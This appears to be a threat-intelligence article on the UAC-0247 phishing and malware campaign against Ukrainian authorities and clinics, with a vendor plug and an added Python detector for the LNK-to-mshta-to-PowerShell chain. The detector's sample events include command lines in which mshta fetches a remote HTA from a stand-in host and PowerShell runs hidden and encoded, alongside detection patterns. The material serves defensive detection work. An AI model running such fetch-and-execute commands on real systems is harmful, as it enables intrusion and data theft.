A newly identified cyber campaign known as UAC-0247 has brought renewed attention to the growing risks faced by government and healthcare systems in conflict-affected regions. According to findings released by CERT-UA, this operation specifically targeted municipal authorities, clinics, and emergency healthcare providers across Ukraine with a sophisticated chain of malware designed for data theft and long-term persistence.
The campaign was observed between March and April 2026 and reflects a broader trend in modern cyber operations: combining psychological manipulation with technically advanced malware frameworks. Although the threat actor behind UAC-0247 has not been definitively identified, the complexity of the tools and techniques suggests a well-organized and resourceful adversary.
Phishing Strategy Designed for High Success Rates
The attack begins with a carefully crafted phishing email disguised as a humanitarian aid proposal. This theme is not accidental. In regions dealing with crisis conditions, such messaging increases the likelihood that recipients will open emails and interact with embedded links.
Once clicked, the link directs the victim to either a compromised legitimate website or a fake page generated using artificial intelligence tools. In scenarios involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious scripts. This approach allows them to maintain a sense of trust while delivering harmful content.
The end goal at this stage is simple: convince the user to download a malicious file disguised as something legitimate.
Execution Mechanism and Malware Deployment
After interacting with the malicious page, the victim downloads a Windows shortcut file (LNK). While seemingly harmless, this file acts as the launchpad for the attack. When executed, it triggers the Windows utility “mshta.exe,” which is used to run a remote HTML Application (HTA).
The HTA file serves as both a distraction and a delivery mechanism. It displays a decoy interface to the user while quietly downloading and executing additional malicious payloads in the background.
The payload then injects shellcode into legitimate processes such as RuntimeBroker.exe. By running inside a trusted system process rather than as a standalone binary, the malware avoids raising suspicion and bypasses many traditional detection methods that key on unfamiliar executables.
In more advanced cases, the attackers employ a two-stage loader system. The second stage is implemented using a custom executable format capable of handling structured code execution and dynamic linking. The payload is encrypted and compressed, making reverse engineering and detection significantly more challenging.
Maintaining Access and Command Control
Once the system is compromised, the attackers establish persistence through a reverse shell known as RAVENSHELL. This tool creates a communication channel between the infected machine and the attacker’s command server, allowing remote execution of commands via standard system utilities.
Alongside this, the malware family AGINGFLY is deployed. Developed in C#, it provides extensive control over the infected system, enabling attackers to execute commands, log keystrokes, transfer files, and deploy additional malware.
A PowerShell-based component named SILENTLOOP further strengthens the attack. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to maintain communication even if primary servers are disrupted.
Data Exfiltration and Network Expansion
The primary objective of UAC-0247 is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including saved credentials, cookies, and session tokens. They also deploy tools designed to access WhatsApp Web data, enabling them to capture private conversations.
In addition to data exfiltration, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.
Some instances of the attack also include cryptocurrency mining modules, suggesting that financial gain may be a secondary objective.
Detection Challenges in Modern Threats
The stealthy nature of this campaign makes it particularly difficult to detect. By using legitimate system tools and encrypting payloads, attackers can operate under the radar of traditional security solutions.
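The execution chain described above (shortcut file, then mshta.exe pulling a remote HTA, then a hidden PowerShell stage) is built from legitimate Windows binaries, so the detection opportunity lies in how those binaries are invoked and who their parent is rather than in the binaries themselves. The following added example is not from CERT-UA's report or from any vendor tool; it is a small Python checker run over constructed Sysmon-style process-creation records (pid, parent pid, image path, command line) that flags mshta.exe launched with a remote URL, mshta.exe started from explorer.exe (consistent with a double-clicked LNK), and PowerShell that descends from mshta.exe or uses encoded or hidden-window arguments. The sample events, hostnames and command lines are invented for illustration.

```python
"""Flag the LNK -> mshta.exe -> remote HTA -> PowerShell chain in process-creation
telemetry. Added example, not code from the original article; input records are
constructed to resemble Sysmon Event ID 1 fields."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Remote HTA delivery: mshta.exe given an http(s) URL instead of a local file.
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell arguments typical of hands-off loaders.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|en|enc|encodedcommand)\s", re.IGNORECASE)
HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestors(event: ProcEvent, by_pid: dict):
    """Walk parent links upward; stop on a missing parent or a cycle."""
    seen = set()
    while event.ppid in by_pid and event.ppid not in seen:
        seen.add(event.ppid)
        event = by_pid[event.ppid]
        yield event


def find_suspicious_chains(events):
    """Return a list of findings, one dict per flagged process, in input order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name == "mshta.exe":
            if REMOTE_URL.search(e.cmdline):
                findings.append({"pid": e.pid, "image": name, "severity": "high",
                                 "reasons": ["mshta.exe executing a remote HTA"]})
            elif pname == "explorer.exe":
                # A shortcut double-click runs its target directly under explorer.exe;
                # local HTAs are sometimes legitimate, so rank this low and review.
                findings.append({"pid": e.pid, "image": name, "severity": "low",
                                 "reasons": ["mshta.exe started from explorer.exe; verify the HTA target"]})
        elif name in POWERSHELL:
            reasons = []
            from_mshta = any(basename(a.image) == "mshta.exe" for a in ancestors(e, by_pid))
            if from_mshta:
                reasons.append("PowerShell descended from mshta.exe")
            if ENCODED_PS.search(e.cmdline):
                reasons.append("encoded command")
            if HIDDEN_PS.search(e.cmdline):
                reasons.append("hidden window")
            if reasons:
                findings.append({"pid": e.pid, "image": name,
                                 "severity": "high" if from_mshta else "medium",
                                 "reasons": reasons})
    return findings


# Constructed sample telemetry (not real campaign data): one malicious chain,
# one local HTA opened from Explorer, and one benign scheduled script.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 400, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://aid-proposal.example.invalid/update.hta"),
    ProcEvent(1300, 1200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(1500, 400, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Users\alice\Documents\form.hta"'),
    ProcEvent(1600, 900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"pid={f['pid']} {f['image']} [{f['severity']}]: {'; '.join(f['reasons'])}")
```

The ancestry walk is what gives the PowerShell rule its weight: an encoded command alone is a medium-confidence signal that legitimate automation also produces, but an encoded, hidden-window PowerShell whose ancestor is mshta.exe is the chain the campaign relies on. In production the same logic applies to Sysmon or EDR process-creation events keyed by process GUID rather than PID, since PIDs are reused.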
This highlights the importance of visibility and intelligence in modern cybersecurity. Platforms like IntelligenceX provide organizations with the ability to identify exposed assets, monitor malicious infrastructure, and track threat activity across multiple sources.
By leveraging IntelligenceX, security teams can gain insights into attacker behavior, detect suspicious domains, and proactively mitigate risks before they escalate.
Mitigation and Defense Strategies
To reduce exposure to such threats, organizations should restrict the execution of file types commonly used in attacks, including LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe and PowerShell can also reduce the attack surface.
User awareness training remains critical, as phishing continues to be one of the most effective entry points for attackers.
Conclusion
The UAC-0247 campaign is a clear example of how cyber threats are evolving in both scale and sophistication. Organizations must adopt proactive security strategies, combining visibility, intelligence, and strong internal controls to defend against such advanced attacks.